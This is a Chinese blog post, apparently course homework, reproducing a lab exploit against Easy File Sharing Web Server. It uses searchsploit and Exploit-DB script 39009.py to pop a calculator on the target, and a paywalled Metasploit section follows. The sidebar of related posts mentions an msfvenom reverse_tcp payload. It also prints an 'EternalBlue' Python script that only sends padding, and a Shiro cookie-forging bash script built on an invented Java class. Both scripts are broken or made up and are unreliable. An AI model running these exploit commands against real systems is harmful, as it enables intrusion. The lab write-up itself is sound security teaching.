网络渗透复现A

最新推荐文章于 2024-12-17 20:48:23 发布
原创 最新推荐文章于 2024-12-17 20:48:23 发布 · 448 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全 #web安全 #系统安全

一、漏洞渗透测试
1、靶机安装easy file sharing web server(efssetup_2018.zip)
2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100
3、利用该漏洞,使得靶机运行计算器。P116-119

实验过程

靶机安装efssetup

配置8000端口

查找EasyFileSharing的有关漏洞

searchsploit Easy File Sharing Web Server

再输入

python /usr/share/exploitdb/exploits/windows/remote/39009.py 开放服务的靶机的ip(被控端) 8000 

最后观察到,靶机弹出了计算器,并且easy file软件崩溃闪退;

二、Metasploit应用
1、生成主控端、被控端。
2、获得靶机(Windows)控制

最低0.47元/天 解锁文章
worker___
关注
网络安全工具系列:网络安全-MS17-010漏洞-永恒之蓝复现以及渗透流程
weixin_54626591的博客
08-05 484
网络安全-MS17-010漏洞-永恒之蓝复现以及渗透流程
渗透测试基础之永恒之蓝漏洞复现
记录开发和安全学习过程中的点点滴滴
09-08 2486
渗透测试(Penetration Testing)是指专业的安全测试人员模拟黑客攻击的行为,对目标系统进行主动攻击测试的过程。通过模拟攻击,渗透测试帮助企业评估其系统或网络安全性,发现潜在的安全漏洞和弱点,从而提供相应的防护措施和改进建议。渗透测试的目的是帮助组织发现和修复系统中的安全漏洞,以提升安全性和防御能力。每日一言。
渗透复现A
Huangyuanyuan111的博客
12-15 2428
1、在靶机安装efssetup 2、使用nmap扫描,发现8080端口打开 3、对Easy File Sharing Web Server进行漏洞查找。 4、执行其中的漏洞脚本,发现计算机被打开
网络渗透测试漏洞复现任务
m0_64229840的博客
11-21 622
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。P99-100。3、利用该漏洞,使得靶机运行计算器。P116-119
靶场复现渗透测试流程
sinat_38378265的博客
05-02 921
外网渗透 使用御剑扫描目录获取到管理员后台登陆界面。 (此处还有收集whois和ip等信息,由于是自己搭建的靶场就不搜集了) 使用nmap只能扫描到80端口开放。 然后登陆后台管理,尝试弱密码登陆,账号admin和密码admin123登陆成功。 登陆页面之后发现页面有上传文件,尝试直接上传一句话木马php,文件报错,而且有流量经过,说明不是js前端验证。然后尝试修改上传格式,添加了php格...
网络渗透———复现任务
m0_60411436的博客
11-07 361
1、靶机安装easy file sharing server(efssetup_2018.zip) 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 打开VM,从文件中打开Metasploitable2并登录,用户名跟密码都是msfadmin。显示msfadmin@metsploitable:~$ 即登录成功。然后运行infonfig确认靶机IP地址。 从kali信息收集中找到nmap并打开, 输入sudo passwd root登录 输入密码su root 成功获取root权限。
Web渗透实例复现(一)(通达OA11.2)
InterplanetaryW的博客
07-13 2650
以通达OA系统11.2版本为案例的Web渗透 1. 渗透背景: 目标站点:VM虚拟机 O A 版本:通达OA系统11.2 目标系统:Windows server 2008 R2 SP1 威胁等级:高危 渗透工具:BurpSuite pro、SeayDzend、TongDaOA-Fake-User、PHPstorm、蚁剑、VMware 2. 存在漏洞 前台任意用户登录漏洞 前台未授权访问漏洞 管理后台文件上传漏洞 后台SQL注入漏洞 文件包含getshell 3. 漏洞复现 3.1 前台任意用户登录漏洞
DC-4渗透测试复现
m0_63138919的博客
09-28 239
本文为一次简单DC4的渗透测试
内网渗透复现练习
qq_73861475的博客
12-17 795
Nmap是一款开源的网络探测和安全审核工具,可以用来扫描网络主机,确定哪些主机在运行、运行哪些服务以及运行哪个操作系统等信息。它可以通过各种方式对目标主机进行探测,如TCP SYN扫描、UDP扫描、TCP connect() 扫描、FTP bounce攻击扫描等。同时,nmap还具有多种高级功能,如操作系统指纹识别、版本探测、脚本扫描等,是网络安全人员必备的工具之一。
Linux无文件木马程序渗透测试复现
永远是少年
06-15 1427
今天继续给大家介绍渗透测试相关知识,本文主要内容是Linux无文件木马程序渗透测试复现。 一、实战介绍 二、初次渗透测试 三、无文件木马渗透测试
最好的web文件分享工具Easy File Sharing Web Server
05-26
Easy File Sharing Web Server允许用户不需要任何附加的软件或服务就可以架设一个安全的、基于网页的P2P文件分享、传输系统。 除了HTML网页界面设计,Easy File Sharing Web Server还可以让你直接在自己的PC上快速架起一个网站,你可以用它来和朋友们分享照片、音乐、视频,还可以让其它用户通过一个简单的网页界面上传自己的收藏到你的PC伤,真正达到分享资源的目的。
【漏洞渗透测试复现easy file sharing server
qq_61947585的博客
11-21 928
渗透测试 easy file sharing server
渗透测试技巧总结【漏洞复现
kevinhanser
03-30 1328
本文将记录我收集到的渗透测试小技巧 将文件从Linux传输到Windows(后期利用
easy file sharing web server 复现 + msf被控端与主控端使用
WRplayeR的博客
12-20 637
1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。选择使用 exploit/windows/http/easyfilesharing_seh 这个攻击模块。使用命令msfvenom -p windows/meterpreter/reverse_tcp。退出命令行后使用download下载efssetup_20181文件,成功。3、利用该漏洞,使得靶机运行计算器。2、利用Nmap扫描发现靶机(Windows)运行了该服务。
kali上使用msf渗透win7(永恒之蓝操作复现)初学者指南
热门推荐
weixin_45596770的博客
04-18 1万+
首先开篇先放出我使用的kali 与 win7 的网盘链接: 大家VMware上新建虚拟机即可~ 简单介绍一个Metasploit,一个免费的、开源的渗透测试框架,kali上可以直接使用~ 1. Metasploit初始化 在使用之前我们需要对Metasploit进行初始化,并启动: 终端窗口的命令行输入如下命令 systemctl start postgresql systemctl enable postgresql 启动专用的数据库,并设置为每次开机自动启动 msfconsole 或者 点击kali
复现任务——漏洞渗透测试及Metasploit应用
m0_74087834的博客
12-29 1324
一、漏洞渗透测试 1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞,使得靶机运行计算器。 见第六章PPT或PDF文档 二、Metasploit应用 1、生成主控端、被控端。 2、获得靶机(Windows)控制权。 3、下载靶机上任意一个文件。 见课本P127-133
Easy File Sharing Web Server漏洞渗透测试
qq_51634663的博客
12-15 712
复现环境 1、ExpNIS.Windos(靶机) 2、Easy File Sharing Web Server 6.9(软件) 3、Kali-Linux(攻击机) 漏洞复现 1、首先在靶机上安装软件Easy File Sharing Web Server 2018并打开(安装过程较为简单此处不详细说明) 2、在靶机上安装完成后我们还需要找到该靶机,在kali上使用nmap扫描该网段 3、发现靶机IP后,我们使用命令nmap -sV 【目标IP】查看该目标主机上运行的服务,例如在此处我.
Easy File Sharing Web Server 缓冲区溢出漏洞
qq_55857040的博客
12-14 2414
目录 漏洞介绍 环境准备 复现过程 一、环境搭建 二、漏洞利用 利用漏洞 利用metasploit进行漏洞利用 在kali打开msf控制台 ​ 输入命令,寻找找到EasyFileSharing漏洞的利用模块 小结 漏洞介绍 由于Easy File Sharing Web Server 6.9这个程序对输入的用户名长度不进行校验,存在缓冲区溢出漏洞,导致当用户输入太长的用户名导致缓冲区溢出,覆盖程序原本的返回地址,导致程序因跳转到非法地址奔溃或跳转到黑客控制的恶意代码地址进...
新型网络攻击漏洞复现
最新发布
03-13
### 如何研究和复现最新的网络安全漏洞 #### 资料准备 为了有效开展网络安全漏洞的研究与复现工作,需要具备全面的理论知识和技术支持。可以从以下方面着手准备: - 获取权威的安全书籍作为基础知识储备[^1]。 - 利用工具包中的各类渗透测试软件辅助实验环境搭建。 - 学习并掌握实际案例中的源码实现细节以及其背后的设计原理。 #### 实战演练 通过具体实例加深理解是非常重要的环节之一。例如针对“永恒之蓝”这一经典场景展开深入探讨[^2]: ```python import socket from struct import pack def exploit_eternalblue(target_ip, target_port=445): try: s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((target_ip, target_port)) # 构造恶意数据包 (简化版本用于演示目的) buffer_size = 1024 * b"A" payload = pack("<I", len(buffer_size)) + buffer_size s.send(payload) response = s.recv(1024).decode('utf-8') print(f"[+] Response from {target_ip}: {response}") except Exception as e: print(f"[-] Error occurred while exploiting EternalBlue on {target_ip}. Details: {str(e)}") if __name__ == "__main__": target_host = input("[*] Enter Target Host IP Address: ") exploit_eternalblue(target_host) ``` 上述脚本仅为教学用途展示如何向目标主机发送特定格式的数据触发潜在缺陷。 #### 漏洞利用框架应用 某些情况下可以直接借助现有的开源项目快速验证假设条件下的可行性方案。比如基于Apache Shiro框架开发的应用程序可能存在Remember Me功能相关的认证绕过风险[^3]。此时可通过如下方式尝试获取Web Shell控制权: ```bash #!/bin/bash # 设置参数变量 URL="http://example.com/login" COOKIE_NAME="_rememberMe" # 创建伪造Cookie值 SER=`java -cp /path/to/sherlock.jar com.tangosol.coherence.security.Sherlock --encrypt ""` FORGED_COOKIE="${COOKIE_NAME}=${SER}" curl -X POST \ -H "Content-Type: application/x-www-form-urlencoded;charset=UTF-8" \ -b "${FORGED_COOKIE}" \ -d 'username=admin&password=password' \ ${URL} ``` 此方法依赖于Java序列化机制特性完成非法登录过程模拟。 #### 新型威胁跟踪 持续关注行业动态确保第一时间了解到高危零日漏洞情报至关重要。近期VMware系列产品暴露出严重的RCE隐患即为典型代表事件[^4]。研究人员应当仔细阅读官方补丁说明文档寻找可能存在的逻辑错误或者未完全修复之处进一步挖掘深层次问题所在。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值